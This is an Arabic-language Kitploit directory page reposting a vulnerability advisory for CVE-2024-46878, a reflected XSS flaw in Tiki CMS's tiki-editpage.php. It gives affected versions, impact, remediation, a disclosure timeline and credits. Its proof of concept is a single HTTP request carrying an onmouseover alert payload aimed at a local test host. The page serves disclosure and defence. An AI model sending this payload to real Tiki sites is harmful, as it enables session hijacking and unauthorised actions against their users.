Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46878-TikiCMS-XSS — CVE-2024-46878 - ثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في Tiki CMS | Kitploit
أدوات/GitHubGitHub/coldfusionx/cve-2024-46878-tikicms-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubcoldfusionx/cve-2024-46878-tikicms-xss

CVE-2024-46878-TikiCMS-XSS

CVE-2024-46878 - ثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة في Tiki CMS

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

CVE-2024-46878 - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS) في Tiki CMS

Tiki CMS - ثغرة البرمجة النصية عبر المواقع المنعكسة (XSS) في معامل 'page'

إخلاء مسؤولية

مخصصة فقط للأغراض التعليمية والبحثية والدفاعية. الاستخدام غير المصرح به ضد الأنظمة دون إذن غير قانوني.

ملخص

توجد ثغرة برمجة نصية عبر المواقع المنعكسة (XSS) في معامل page في ملف tiki-editpage.php في Tiki الإصدار 26.3 وما قبله. تسمح هذه الثغرة للمهاجمين بتنفيذ كود JavaScript تعسفي عبر حمولة مصممة بعناية، مما يؤدي إلى احتمال الوصول إلى معلومات حساسة أو إجراءات غير مصرح بها.

المنتج (المنتجات) المتأثر

  • المنتج: Tiki CMS Groupware
  • الإصدارات: 26.3 وما قبله
  • المكوّن: tiki-editpage.php

تفاصيل الثغرة

تنجم الثغرة عن عدم كفاية تعقيم المدخلات لمعامل page في tiki-editpage.php. ينعكس الإدخال المقدم من المستخدم في استجابة HTTP دون ترميز كافٍ، مما يسمح بتنفيذ JavaScript محقون.

التأثير

تسمح لمهاجم مصادق بتنفيذ JavaScript تعسفي في متصفح مستخدم آخر عبر طلب مصمم بعناية، مما قد يؤدي إلى اختطاف الجلسة أو إجراءات غير مصرح بها.

إثبات المفهوم (PoC)

الطلب

root@kitploit:~
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

poc

المعالجة

تمت معالجة المشكلة في Tiki CMS Groupware الإصدار 27.1. يُنصح المستخدمون بالترقية إلى هذا الإصدار أو أي إصدار مصحح لاحق.

مرجع البائع: https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended

الجدول الزمني

  • أُبلغ البائع: 5 سبتمبر 2024
  • إقرار البائع: 16 سبتمبر 2024
  • تم الإصلاح في الإصدار 27.1: 22 ديسمبر 2024
  • الكشف العام (عبر هذا المستودع): 23 مارس 2026

الاعتمادات

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

المراجع

  • https://www.cve.org/CVERecord?id=CVE-2024-46878
  • https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended
تنزيل الأداة